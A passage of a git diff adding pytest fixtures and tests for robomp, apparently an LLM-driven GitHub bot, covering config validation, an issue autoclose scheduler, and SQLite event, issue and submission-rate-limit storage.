asyncio.to_thread(_capture_natives_cache, inputs) + return result + + +def _capture_natives_cache(inputs: TaskInputs) -> None: + """Best-effort: store the workspace's fresh natives under its current key. + + Runs after a successful task on a worker thread. ANY failure is logged + and swallowed — cache errors NEVER fail a task. + """ + cache = inputs.natives_cache + if cache is None: + return + workspace = inputs.workspace + native_dir = workspace.repo_dir / "packages" / "natives" / "native" + if not native_dir.exists(): + return + try: + key = natives_compute_key(workspace.repo_dir) + except Exception as exc: + log.debug( + "natives_cache capture key compute failed", + extra={"workspace": workspace.workspace_key, "err": str(exc)}, + ) + return + try: + stored = cache.capture( + workspace.repo_full_name, + key, + native_dir, + source_workspace=workspace.workspace_key, + ) + except Exception as exc: + log.warning( + "natives_cache capture failed", + extra={"workspace": workspace.workspace_key, "key": key, "err": str(exc)}, + ) + return + log.info( + "natives_cache", + extra={ + "action": "stored" if stored is not None else "skip", + "workspace": workspace.workspace_key, + "repo": workspace.repo_full_name, + "key": key, + "cache_dir": str(stored) if stored else None, + }, + ) + + +__all__ = ["DirectiveInfo", "TaskInputs", "ThreadMessage", "run_task"] diff --git a/python/robomp/tests/__init__.py b/python/robomp/tests/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/python/robomp/tests/conftest.py b/python/robomp/tests/conftest.py new file mode 100644 index 000000000..89959e5fb --- /dev/null +++ b/python/robomp/tests/conftest.py @@ -0,0 +1,154 @@ +"""Common pytest fixtures.""" + +from __future__ import annotations + +from pathlib import Path + +import pytest + +from robomp.config import Settings, reset_settings_cache +from robomp.dashboard import reset_index_cache, static_dir +from robomp.db import Database, close_database + +# Minimum HTML the dashboard handler needs to render: `<title>` plus a script +# block carrying the `__ROBOMP_CONFIG__` sentinel. The real Vite-built bundle +# adds JS/CSS asset links; tests only care about the rendering contract. +_PLACEHOLDER_INDEX_HTML = ( + "<!doctype html>\n" + '<html lang="en">\n' + ' <head><meta charset="utf-8"><title>robomp\n' + " \n" + '
\n' + ' \n' + " \n" + "\n" +) + + +@pytest.fixture(autouse=True, scope="session") +def _ensure_dashboard_bundle() -> None: + """Guarantee a renderable dashboard bundle for the whole session. + + The real bundle is produced by `bun run web:build`; CI and fresh clones + might not have run it yet. We only synthesise an `index.html` when one + isn't already present, so a developer's locally-built bundle isn't + clobbered by the test run. + """ + directory = static_dir() + index = directory / "index.html" + if not index.exists(): + index.write_text(_PLACEHOLDER_INDEX_HTML, encoding="utf-8") + reset_index_cache() + + +@pytest.fixture(autouse=True) +def _open_tmp_path_for_slot_traversal(tmp_path: Path) -> None: + """Grant traverse (`+x`) on tmp_path's root-owned ancestors so slot + subprocesses can reach the workspace. + + pytest's default ``tmp_path`` lives under ``/tmp/pytest-of-/`` with + mode ``0700``. On macOS dev that's irrelevant (no slot subprocess ever + drops uid). On Linux+root the slot UID (e.g. 2001) is non-zero and + every directory between ``/`` and the workspace needs at least the + `o+x` bit or the slot's stat fails with EACCES. Adds `o+x` (NOT `o+r`) + so directory contents stay private; only path-traversal is allowed. + """ + import os + import platform + import stat + + if platform.system() != "Linux" or os.geteuid() != 0: + return + cursor = tmp_path.resolve() + while cursor != cursor.parent: + try: + st = cursor.stat() + except FileNotFoundError: + break + if not stat.S_ISDIR(st.st_mode): + break + if not (st.st_mode & 0o001): + try: + cursor.chmod(st.st_mode | 0o001) + except PermissionError: + break + cursor = cursor.parent + + +def _baseline_env(tmp_path: Path) -> dict[str, str]: + return { + # Orchestrator-mode: no PAT in this container; talk to gh-proxy instead. + "ROBOMP_GH_PROXY_URL": "http://gh-proxy.invalid:8081", + "ROBOMP_GH_PROXY_HMAC_KEY": "test-hmac-key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + "GITHUB_WEBHOOK_SECRET": "test-webhook-secret", + "ROBOMP_BOT_LOGIN": "robomp-bot", + "ROBOMP_GIT_AUTHOR_NAME": "robomp-bot", + "ROBOMP_GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "ROBOMP_REPO_ALLOWLIST": "octo/widget", + "ROBOMP_MODEL": "anthropic/claude-sonnet-4-5", + "ROBOMP_THINKING": "high", + "ROBOMP_WORKSPACE_ROOT": str(tmp_path / "workspaces"), + "ROBOMP_SQLITE_PATH": str(tmp_path / "robomp.sqlite"), + "ROBOMP_LOG_DIR": str(tmp_path / "logs"), + # Production default is `/data/cache/pi-natives` (provisioned by the + # container entrypoint). Tests need a writable, isolated path; we also + # default-disable the cache so its background GC loop doesn't add + # noise to event-dispatcher timing assertions. Tests that want the + # cache flip `ROBOMP_NATIVES_CACHE_ENABLED=true` explicitly. + "ROBOMP_NATIVES_CACHE_ROOT": str(tmp_path / "natives-cache"), + "ROBOMP_NATIVES_CACHE_ENABLED": "false", + } + + +@pytest.fixture +def env(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> dict[str, str]: + env = _baseline_env(tmp_path) + for key, value in env.items(): + monkeypatch.setenv(key, value) + # Defensive: a stray `.env` or shell export must not flip us into PAT mode. + # `monkeypatch.delenv` would let pydantic_settings fall back to the .env + # file; setenv("") is what actually shadows the file value, and the + # `_blank_token_disables` validator treats empty strings as unset. + monkeypatch.setenv("GITHUB_TOKEN", "") + monkeypatch.delenv("ROBOMP_PROVIDER", raising=False) + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", "") + reset_settings_cache() + yield env + reset_settings_cache() + close_database() + + +@pytest.fixture +def proxy_env(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> dict[str, str]: + """Baseline env for the gh-proxy container: holds the PAT, no proxy vars.""" + baseline = _baseline_env(tmp_path) + baseline.pop("ROBOMP_GH_PROXY_URL", None) + baseline.pop("ROBOMP_GH_PROXY_HMAC_KEY", None) + baseline["GITHUB_TOKEN"] = "ghp_test_token_value_xxxxxxxxxxxxxxxx" + for key, value in baseline.items(): + monkeypatch.setenv(key, value) + # Same defense-in-depth as `env`: setenv("") rather than delenv so + # pydantic_settings doesn't fall back to the on-disk `.env` file. + monkeypatch.setenv("ROBOMP_GH_PROXY_URL", "") + monkeypatch.setenv("ROBOMP_GH_PROXY_HMAC_KEY", "") + monkeypatch.delenv("ROBOMP_PROVIDER", raising=False) + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", "") + reset_settings_cache() + yield baseline + reset_settings_cache() + close_database() + + +@pytest.fixture +def settings(env: dict[str, str]) -> Settings: + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + return cfg + + +@pytest.fixture +def db(tmp_path: Path) -> Database: + path = tmp_path / "test.sqlite" + database = Database(path) + yield database + database.close() diff --git a/python/robomp/tests/test_autoclose.py b/python/robomp/tests/test_autoclose.py new file mode 100644 index 000000000..f125b00ef --- /dev/null +++ b/python/robomp/tests/test_autoclose.py @@ -0,0 +1,191 @@ +"""Coverage for `AutocloseScheduler` against in-process fakes.""" + +from __future__ import annotations + +from collections.abc import Iterable + +import pytest +from pydantic import SecretStr + +from robomp.autoclose import AutocloseScheduler +from robomp.config import Settings +from robomp.db import Database, issue_key +from robomp.github_client import GitHubError, ReactionInfo + + +def _settings(*, enabled: bool = True, hours: float = 4.0, scan: float = 60.0) -> Settings: + return Settings.model_construct( + github_token=None, + github_webhook_secret=SecretStr("x"), + bot_login="robomp-bot", + git_author_email="bot@example.invalid", + repo_allowlist_raw="octo/widget", + gh_proxy_url="http://proxy.invalid", + gh_proxy_hmac_key=SecretStr("k" * 32), + question_autoclose_enabled=enabled, + question_autoclose_hours=hours, + question_autoclose_scan_seconds=scan, + ) + + +class _FakeGitHub: + """Minimal GitHubBackend stand-in for the scheduler. + + Only `list_comment_reactions` and `close_issue` are exercised; everything + else raises so a misuse here surfaces loudly instead of silently. + """ + + def __init__( + self, + *, + reactions: Iterable[ReactionInfo] = (), + close_error: GitHubError | None = None, + ) -> None: + self._reactions = tuple(reactions) + self._close_error = close_error + self.close_calls: list[tuple[str, int, str]] = [] + self.reaction_calls: list[tuple[str, int]] = [] + + async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]: + self.reaction_calls.append((repo, comment_id)) + return self._reactions + + async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None: + self.close_calls.append((repo, number, reason)) + if self._close_error is not None: + raise self._close_error + + +_KEY = issue_key("octo/widget", 42) + + +def _seed(db: Database, *, close_at: str = "2000-01-01T00:00:00.000000Z") -> None: + db.upsert_pending_closure( + issue_key=_KEY, + repo="octo/widget", + number=42, + comment_id=999, + issue_author="alice", + close_at=close_at, + ) + + +async def test_tick_closes_when_no_author_downvote(db: Database) -> None: + _seed(db) + gh = _FakeGitHub() + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 1, "cancelled": 0, "retried": 0} + assert gh.close_calls == [("octo/widget", 42, "completed")] + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "closed" + assert row.cancel_reason is None + + +async def test_tick_cancels_when_author_downvotes(db: Database) -> None: + _seed(db) + gh = _FakeGitHub( + reactions=[ReactionInfo(content="-1", user_login="Alice", user_type="User")], + ) + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 0, "cancelled": 1, "retried": 0} + assert gh.close_calls == [] + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "cancelled" + assert row.cancel_reason == "author_downvoted" + + +async def test_tick_ignores_downvote_from_non_author(db: Database) -> None: + """Watchers / drive-by 👎 from anyone other than the author do not veto.""" + _seed(db) + gh = _FakeGitHub( + reactions=[ + ReactionInfo(content="-1", user_login="rando", user_type="User"), + ReactionInfo(content="-1", user_login="some-bot", user_type="Bot"), + ], + ) + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 1, "cancelled": 0, "retried": 0} + assert gh.close_calls == [("octo/widget", 42, "completed")] + + +async def test_tick_retries_after_transient_close_error(db: Database) -> None: + _seed(db) + gh = _FakeGitHub(close_error=GitHubError(502, "Bad Gateway")) + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 0, "cancelled": 0, "retried": 1} + row = db.get_pending_closure(_KEY) + # Failed attempt resets the row to `pending` so the next tick claims it again. + assert row is not None and row.state == "pending" + + +async def test_tick_treats_404_close_as_already_closed(db: Database) -> None: + _seed(db) + gh = _FakeGitHub(close_error=GitHubError(404, "Not Found")) + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 0, "cancelled": 1, "retried": 0} + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "cancelled" + assert row.cancel_reason == "already_closed" + + +async def test_tick_retries_when_list_reactions_fails(db: Database) -> None: + _seed(db) + + class _ReactBoom(_FakeGitHub): + async def list_comment_reactions(self, repo, comment_id): + raise GitHubError(503, "Service Unavailable") + + gh = _ReactBoom() + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 0, "cancelled": 0, "retried": 1} + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "pending" + + +async def test_tick_skips_future_rows(db: Database) -> None: + """A row whose `close_at` is in the future stays pending.""" + _seed(db, close_at="2999-01-01T00:00:00.000000Z") + gh = _FakeGitHub() + sched = AutocloseScheduler(settings=_settings(), db=db, github=gh) + counts = await sched.tick() + assert counts == {"closed": 0, "cancelled": 0, "retried": 0} + assert gh.close_calls == [] + row = db.get_pending_closure(_KEY) + assert row is not None and row.state == "pending" + + +def test_scheduler_disabled_when_feature_off() -> None: + sched = AutocloseScheduler( + settings=_settings(enabled=False), + db=None, # type: ignore[arg-type] + github=None, # type: ignore[arg-type] + ) + assert not sched.enabled + + +def test_scheduler_disabled_when_hours_zero() -> None: + sched = AutocloseScheduler( + settings=_settings(hours=0.0), + db=None, # type: ignore[arg-type] + github=None, # type: ignore[arg-type] + ) + assert not sched.enabled + + +@pytest.mark.asyncio +async def test_start_is_noop_when_disabled(db: Database) -> None: + sched = AutocloseScheduler( + settings=_settings(enabled=False), + db=db, + github=_FakeGitHub(), + ) + await sched.start() + # No background task should have been created. + assert sched._task is None # type: ignore[attr-defined] + await sched.stop() # idempotent diff --git a/python/robomp/tests/test_config.py b/python/robomp/tests/test_config.py new file mode 100644 index 000000000..5f1f3e627 --- /dev/null +++ b/python/robomp/tests/test_config.py @@ -0,0 +1,134 @@ +from __future__ import annotations + +import pytest +from pydantic import ValidationError + +from robomp.config import Settings, reset_settings_cache + + +def test_settings_load_from_env(env: dict[str, str]) -> None: + cfg = Settings() # type: ignore[call-arg] + assert cfg.bot_login == "robomp-bot" + assert cfg.repo_allowlist == frozenset({"octo/widget"}) + assert cfg.allows("octo/widget") + assert cfg.allows("Octo/Widget") + assert not cfg.allows("other/widget") + + +def test_settings_missing_required(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + """Empty out every credential source: validator MUST trip the + 'no GitHub access configured' branch. The `env` fixture keeps the other + required fields satisfied so we isolate the credential-validator path.""" + monkeypatch.setenv("GITHUB_TOKEN", "") + monkeypatch.setenv("ROBOMP_GH_PROXY_URL", "") + monkeypatch.setenv("ROBOMP_GH_PROXY_HMAC_KEY", "") + reset_settings_cache() + with pytest.raises(ValidationError, match="no GitHub access configured"): + Settings() # type: ignore[call-arg] + + +def test_orchestrator_mode_loads_proxy_config(env: dict[str, str]) -> None: + cfg = Settings() # type: ignore[call-arg] + assert cfg.github_token is None + assert cfg.gh_proxy_url == "http://gh-proxy.invalid:8081" + assert cfg.gh_proxy_hmac_key is not None + assert cfg.gh_proxy_hmac_key.get_secret_value().startswith("test-hmac-key") + + +def test_rejects_token_and_proxy_together(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("GITHUB_TOKEN", "x") + reset_settings_cache() + with pytest.raises(ValidationError): + Settings() # type: ignore[call-arg] + + +def test_rejects_proxy_url_without_key(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_GH_PROXY_HMAC_KEY", "") + reset_settings_cache() + with pytest.raises(ValidationError): + Settings() # type: ignore[call-arg] + + +def test_proxy_mode_loads_pat(proxy_env: dict[str, str]) -> None: + cfg = Settings() # type: ignore[call-arg] + assert cfg.github_token is not None + assert cfg.github_token.get_secret_value() == "ghp_test_token_value_xxxxxxxxxxxxxxxx" + assert cfg.gh_proxy_url is None + assert cfg.gh_proxy_hmac_key is None + + +def test_allowlist_csv_parsing(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_REPO_ALLOWLIST", " alpha/one ,beta/two, ,gamma/three ") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + assert cfg.repo_allowlist == frozenset({"alpha/one", "beta/two", "gamma/three"}) + + +def test_blank_replay_token_treated_as_disabled(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", "") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + assert cfg.replay_token is None + + +def test_whitespace_replay_token_treated_as_disabled(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", " ") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + assert cfg.replay_token is None + + +def test_real_replay_token_preserved(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", "abc") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + assert cfg.replay_token is not None + assert cfg.replay_token.get_secret_value() == "abc" + + +def test_blank_bot_login_rejected(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_BOT_LOGIN", " ") + reset_settings_cache() + with pytest.raises(ValidationError): + Settings() # type: ignore[call-arg] + + +def test_model_pool_single(env: dict[str, str]) -> None: + cfg = Settings() # type: ignore[call-arg] + assert cfg.model_pool == (cfg.model,) + assert cfg.pick_model() == cfg.model + + +def test_model_pool_csv_parses(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv( + "ROBOMP_MODEL", + " codex/gpt-5.4 , anthropic/claude-sonnet-4-6 ,, anthropic/claude-opus-4-7 ", + ) + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + assert cfg.model_pool == ( + "codex/gpt-5.4", + "anthropic/claude-sonnet-4-6", + "anthropic/claude-opus-4-7", + ) + + +def test_pick_model_covers_full_pool(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + """With a 3-item pool and 500 picks, each option appears at least once.""" + monkeypatch.setenv("ROBOMP_MODEL", "a,b,c") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + seen = {cfg.pick_model() for _ in range(500)} + assert seen == {"a", "b", "c"} + + +def test_max_concurrency_default_is_8(env: dict[str, str]) -> None: + cfg = Settings() # type: ignore[call-arg] + assert cfg.max_concurrency == 8 + + +def test_task_timeout_hard_grace_env_parses(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> None: + monkeypatch.setenv("ROBOMP_TASK_TIMEOUT_HARD_GRACE_SECONDS", "12.5") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + assert cfg.task_timeout_hard_grace_seconds == 12.5 diff --git a/python/robomp/tests/test_db.py b/python/robomp/tests/test_db.py new file mode 100644 index 000000000..b46bf54cd --- /dev/null +++ b/python/robomp/tests/test_db.py @@ -0,0 +1,562 @@ +from __future__ import annotations + +import threading +from concurrent.futures import ThreadPoolExecutor +from pathlib import Path + +from robomp.db import Database, iso_seconds_ago, issue_key + + +def test_record_event_dedupes_by_delivery(db: Database) -> None: + payload = {"action": "opened", "issue": {"number": 1}} + assert db.record_event( + delivery_id="abc", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 1), + payload=payload, + ) + assert not db.record_event( + delivery_id="abc", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 1), + payload=payload, + ) + + +def test_claim_next_event_singleton_under_contention(db: Database) -> None: + for i in range(5): + db.record_event( + delivery_id=f"d-{i}", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", i), + payload={"i": i}, + ) + + winners: list[str] = [] + lock = threading.Lock() + + def claim() -> None: + row = db.claim_next_event() + if row is not None: + with lock: + winners.append(row.delivery_id) + + with ThreadPoolExecutor(max_workers=8) as pool: + for _ in range(5): + futures = [pool.submit(claim) for _ in range(8)] + for f in futures: + f.result() + + # Each delivery id should appear exactly once. + assert sorted(winners) == [f"d-{i}" for i in range(5)] + assert all(db.get_event(f"d-{i}").state == "running" for i in range(5)) + + +def test_requeue_event_can_be_restricted_by_source_state(db: Database) -> None: + db.record_event( + delivery_id="done-event", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 1), + payload={}, + state="done", + ) + db.record_event( + delivery_id="running-event", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 2), + payload={}, + state="running", + ) + + assert db.requeue_event("done-event", from_states=("done", "failed", "skipped")) + assert db.get_event("done-event").state == "queued" + + assert not db.requeue_event("running-event", from_states=("done", "failed", "skipped")) + assert db.get_event("running-event").state == "running" + + +def test_latest_issue_events_ignore_skipped_noise(db: Database) -> None: + fixed = issue_key("octo/widget", 1) + still_failed = issue_key("octo/widget", 2) + db.record_event( + delivery_id="fixed-failed", + event_type="issues", + repo="octo/widget", + issue_key=fixed, + payload={"action": "opened"}, + state="failed", + ) + db.record_event( + delivery_id="fixed-done", + event_type="issues", + repo="octo/widget", + issue_key=fixed, + payload={"action": "opened"}, + state="done", + ) + db.record_event( + delivery_id="failed-run", + event_type="issues", + repo="octo/widget", + issue_key=still_failed, + payload={"action": "opened"}, + state="failed", + ) + db.record_event( + delivery_id="label-noise", + event_type="issues", + repo="octo/widget", + issue_key=still_failed, + payload={"action": "labeled"}, + state="skipped", + last_error="issues.labeled ignored", + ) + + latest_failed = db.latest_event_for_issue(still_failed) + latest_raw = db.latest_event_for_issue(still_failed, include_skipped=True) + assert latest_failed is not None + assert latest_raw is not None + assert latest_failed.delivery_id == "failed-run" + assert latest_raw.delivery_id == "label-noise" + + latest = db.latest_events_for_issues((fixed, still_failed)) + assert latest[fixed].delivery_id == "fixed-done" + assert latest[still_failed].delivery_id == "failed-run" + + counts = db.latest_issue_event_state_counts() + assert counts["done"] == 1 + assert counts["failed"] == 1 + assert counts["skipped"] == 0 + + +def test_reset_stuck_running_recovers(db: Database) -> None: + db.record_event( + delivery_id="d1", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={}, + ) + row = db.claim_next_event() + assert row is not None + # Capture `started_at` set by the claim so we can prove the recovery flip preserves it. + with db._lock: # noqa: SLF001 + before = db._conn.execute( # noqa: SLF001 + "SELECT started_at FROM events WHERE delivery_id=?", ("d1",) + ).fetchone() + assert before is not None + assert before["started_at"] is not None + # Simulate crash: row still running. + recovered = db.reset_stuck_running() + assert recovered == 1 + assert db.get_event("d1").state == "queued" + with db._lock: # noqa: SLF001 + after = db._conn.execute( # noqa: SLF001 + "SELECT started_at FROM events WHERE delivery_id=?", ("d1",) + ).fetchone() + assert after is not None + assert after["started_at"] == before["started_at"] + + +def test_upsert_issue_round_trip(db: Database) -> None: + key = issue_key("octo/widget", 7) + row = db.upsert_issue( + key=key, + repo="octo/widget", + number=7, + state="new", + ) + assert row.state == "new" + row = db.upsert_issue( + key=key, + repo="octo/widget", + number=7, + state="opened", + branch="farm/abcd1234/some-issue", + session_dir="/tmp/s", + pr_number=42, + ) + assert row.state == "opened" + assert row.branch == "farm/abcd1234/some-issue" + assert row.pr_number == 42 + fetched = db.get_issue(key) + assert fetched and fetched.pr_number == 42 + + found = db.find_issue_by_pr("octo/widget", 42) + assert found and found.key == key + by_branch = db.find_issue_by_branch("octo/widget", "farm/abcd1234/some-issue") + assert by_branch and by_branch.key == key + + +def test_log_tool_call(db: Database) -> None: + db.upsert_issue(key="octo/widget#1", repo="octo/widget", number=1, state="new") + row_id = db.log_tool_call( + issue_key="octo/widget#1", + tool="gh_post_comment", + args={"body": "hi"}, + result={"comment_id": 9}, + ) + assert row_id > 0 + + +def test_processed_issue_keys_returns_only_known(db: Database) -> None: + db.upsert_issue(key=issue_key("octo/widget", 1), repo="octo/widget", number=1, state="new") + db.upsert_issue(key=issue_key("octo/widget", 2), repo="octo/widget", number=2, state="reproducing") + queried = [ + issue_key("octo/widget", 1), + issue_key("octo/widget", 2), + issue_key("octo/widget", 3), # never upserted + issue_key("octo/other", 7), # different repo, never upserted + ] + result = db.processed_issue_keys(queried) + assert result == {issue_key("octo/widget", 1), issue_key("octo/widget", 2)} + + +def test_processed_issue_keys_empty_input(db: Database) -> None: + assert db.processed_issue_keys([]) == set() + # Empty strings are filtered out, not sent as a parameter. + assert db.processed_issue_keys(["", ""]) == set() + + +def test_processed_issue_keys_handles_large_batch(db: Database) -> None: + # Confirms the 500-batch chunking path (>500 parameters would otherwise hit + # SQLite's SQLITE_MAX_VARIABLE_NUMBER default of 999 on older builds). + keys = [issue_key("octo/widget", n) for n in range(1, 750)] + # Persist only every 3rd one. + for k, n in zip(keys, range(1, 750), strict=True): + if n % 3 == 0: + db.upsert_issue(key=k, repo="octo/widget", number=n, state="new") + result = db.processed_issue_keys(keys + ["bogus#1"]) + expected = {issue_key("octo/widget", n) for n in range(1, 750) if n % 3 == 0} + assert result == expected + + +def test_classification_roundtrip(db: Database) -> None: + key = issue_key("octo/widget", 7) + db.upsert_issue(key=key, repo="octo/widget", number=7, state="new") + row = db.get_issue(key) + assert row is not None and row.classification is None + db.set_issue_classification(key, "question") + row = db.get_issue(key) + assert row is not None and row.classification == "question" + # Round-trip via list_issues too. + items = db.list_issues() + assert any(r.key == key and r.classification == "question" for r in items) + + +def test_migration_adds_classification_to_existing_db(tmp_path: Path) -> None: + """Open a DB without the classification column and verify the migration.""" + import sqlite3 + + path = tmp_path / "legacy.sqlite" + conn = sqlite3.connect(str(path)) + conn.executescript( + """ + CREATE TABLE events (delivery_id TEXT PRIMARY KEY, event_type TEXT, payload_json TEXT, + received_at TEXT, state TEXT CHECK(state IN ('queued','running','done','failed','skipped')), + attempts INTEGER DEFAULT 0, last_error TEXT, repo TEXT, issue_key TEXT, + started_at TEXT, finished_at TEXT); + CREATE TABLE issues (key TEXT PRIMARY KEY, repo TEXT, number INTEGER, branch TEXT, + session_dir TEXT, pr_number INTEGER, state TEXT, updated_at TEXT); + CREATE TABLE tool_calls (id INTEGER PRIMARY KEY AUTOINCREMENT, issue_key TEXT, + tool TEXT, args_json TEXT, result_json TEXT, error TEXT, ts TEXT); + INSERT INTO issues VALUES ('octo/widget#1', 'octo/widget', 1, 'farm/x', '/tmp/s', NULL, + 'reproducing', '2026-01-01T00:00:00Z'); + """ + ) + conn.commit() + conn.close() + # Opening through our Database class should auto-migrate. + database = Database(path) + row = database.get_issue("octo/widget#1") + assert row is not None + assert row.classification is None # column exists, default NULL + database.set_issue_classification("octo/widget#1", "bug") + assert database.get_issue("octo/widget#1").classification == "bug" + database.close() + + +def test_set_event_model_persists_on_running_event(db: Database) -> None: + """`set_event_model` writes the picked model so the dashboard can attribute behavior.""" + db.record_event( + delivery_id="d-model", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 42), + payload={"action": "opened"}, + ) + row = db.claim_next_event() + assert row is not None and row.delivery_id == "d-model" + db.set_event_model("d-model", "claude-sonnet-4-5") + running = db.list_running_events() + assert len(running) == 1 + assert running[0]["model"] == "claude-sonnet-4-5" + # Setting a different model later (e.g. retry) overwrites in place. + db.set_event_model("d-model", "claude-opus-4-5") + running = db.list_running_events() + assert running[0]["model"] == "claude-opus-4-5" + + +def test_list_running_events_surfaces_last_tool_since_start(db: Database) -> None: + """`list_running_events` joins the most recent tool_call newer than `started_at`. + + Tool calls logged before the current run (e.g. an earlier triage on the same + issue) MUST NOT be reported as the current activity. + """ + key = issue_key("octo/widget", 7) + db.upsert_issue(key=key, repo="octo/widget", number=7, state="reproducing") + # Stale tool call from a previous run (no started_at yet). + db.log_tool_call(issue_key=key, tool="stale_tool", args={}) + db.record_event( + delivery_id="d-7", + event_type="issues", + repo="octo/widget", + issue_key=key, + payload={"action": "opened"}, + ) + db.claim_next_event() # sets started_at + # Before any current-run tool call: last_tool must be NULL, not "stale_tool". + running = db.list_running_events() + assert len(running) == 1 + assert running[0]["last_tool"] is None + assert running[0]["last_tool_ts"] is None + # New tool call after start → surfaces in the snapshot. + db.log_tool_call(issue_key=key, tool="gh_post_comment", args={"body": "hi"}) + db.log_tool_call(issue_key=key, tool="set_issue_labels", args={"labels": ["bug"]}) + running = db.list_running_events() + assert running[0]["last_tool"] == "set_issue_labels" # latest by ts + assert running[0]["last_tool_ts"] is not None + + +def test_record_submission_dedupes_by_delivery(db: Database) -> None: + assert db.record_submission(delivery_id="d-1", login="Alice", repo="octo/widget") + # Retry of the same delivery id is a no-op (idempotent webhook delivery). + assert not db.record_submission(delivery_id="d-1", login="alice", repo="octo/widget") + + +def test_admit_submission_dedupes_by_delivery_before_rate_limit(db: Database) -> None: + since = iso_seconds_ago(60) + first = db.admit_submission( + delivery_id="d-1", + login="Alice", + repo="octo/widget", + since=since, + cap=1, + ) + assert first.accepted + assert not first.duplicate + assert first.used == 1 + + duplicate = db.admit_submission( + delivery_id="d-1", + login="alice", + repo="octo/widget", + since=since, + cap=1, + ) + assert duplicate.accepted + assert duplicate.duplicate + assert duplicate.used == 1 + + rejected = db.admit_submission( + delivery_id="d-2", + login="ALICE", + repo="octo/widget", + since=since, + cap=1, + ) + assert not rejected.accepted + assert not rejected.duplicate + assert rejected.used == 1 + assert db.count_submissions_since("alice", since) == 1 + + +def test_admit_submission_enforces_cap_atomically_across_connections(tmp_path: Path) -> None: + path = tmp_path / "admission.sqlite" + # Pre-warm: open + migrate the schema once so the two racing threads below + # collide only on `admit_submission` (which is what the test is exercising), + # not on `Database.__init__`. `executescript(SCHEMA)` flips journal_mode to + # WAL, which needs a brief exclusive lock — without pre-warming, one + # thread can lose that race and never reach `barrier.wait()`, deadlocking + # its peer at the barrier (no timeout) and hanging `future.result()`. + Database(path).close() + barrier = threading.Barrier(2, timeout=10) + + def admit(delivery_id: str) -> bool: + database = Database(path) + try: + barrier.wait() + return database.admit_submission( + delivery_id=delivery_id, + login="alice", + repo="octo/widget", + since=iso_seconds_ago(60), + cap=1, + ).accepted + finally: + database.close() + + with ThreadPoolExecutor(max_workers=2) as pool: + futures = [pool.submit(admit, f"d-{i}") for i in range(2)] + accepted = [future.result(timeout=15) for future in futures] + + verifier = Database(path) + try: + assert sorted(accepted) == [False, True] + assert verifier.count_submissions_since("alice", iso_seconds_ago(60)) == 1 + finally: + verifier.close() + + +def test_count_submissions_since_is_case_insensitive(db: Database) -> None: + db.record_submission(delivery_id="d-1", login="Alice", repo="octo/widget") + db.record_submission(delivery_id="d-2", login="ALICE", repo="octo/widget") + db.record_submission(delivery_id="d-3", login="bob", repo="octo/widget") + # Window covering the whole test run. + since = iso_seconds_ago(60) + assert db.count_submissions_since("alice", since) == 2 + assert db.count_submissions_since("ALICE", since) == 2 + assert db.count_submissions_since("bob", since) == 1 + assert db.count_submissions_since("nobody", since) == 0 + + +def test_count_submissions_since_respects_window(db: Database) -> None: + db.record_submission(delivery_id="d-1", login="alice", repo="octo/widget") + # Future cutoff means the just-inserted row is *before* the window. + future = iso_seconds_ago(-60) + assert db.count_submissions_since("alice", future) == 0 + + +# -------- pending_closures --------------------------------------------- + + +_KEY = issue_key("octo/widget", 42) + + +def _seed_pending(db: Database, *, close_at: str = "2026-05-15T00:00:00.000000Z") -> None: + 